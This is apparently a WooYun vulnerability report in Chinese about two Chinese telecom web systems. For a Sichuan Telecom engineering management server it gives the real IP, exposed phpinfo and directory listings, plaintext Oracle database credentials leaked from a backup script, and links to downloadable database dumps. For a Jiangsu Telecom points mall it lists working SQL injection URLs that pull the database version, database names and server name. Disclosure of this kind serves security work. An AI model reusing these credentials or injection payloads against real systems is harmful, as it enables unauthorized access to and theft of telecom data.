WooYun.org

#目标一:
四川省电信工程实施管理系统 （C网基站/FTTX工程管理系统）
#网址:
http://118.123.221.150/
#问题：
phpinfo http://118.123.221.150/info.php
upload目录遍历 http://118.123.221.150/upload/ (里面文件太多，请谨慎打开，容易卡爆了) 有很多应该是绝密的信息，四川各个地方的基站配置安装等等等等。。
backup目录遍历 http://118.123.221.150/backup/
其中 http://118.123.221.150/backup/backup.cmd爆出了数据库类型数据库名称路径账户密码
oracle数据库，账户analyzer密码mary050115800621 数据库名fttx
数据库备份可以下载
比如：http://118.123.221.150/backup/20140904pro.rar
有700m好像
http://118.123.221.150/backup/pro.dmp 这个有将近7个G....
未进一步测试
问题一完毕！！
#目标二 江苏电信积分商城
#注入点
http://jf.js118114.com/SearchList.aspx?SearchWord=1
#手工构造
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=1 ; --返回全部
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=@@version ; -- 爆出数据库版本
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=db_name() ; --
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=db_name(1) ; --
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=db_name(2) ; --
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=db_name(3) ; --
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=db_name(4) ; --
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=db_name(5) ; --
一共5个数据库
http://jf.js118114.com/SearchList.aspx?SearchWord=1') order by 10 ; --
一共有十列
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or 1=(@@servername) ; -- 服务器名
http://jf.js118114.com/SearchList.aspx?SearchWord=1') or having 1=1 ; --
未继续进行构造
#完毕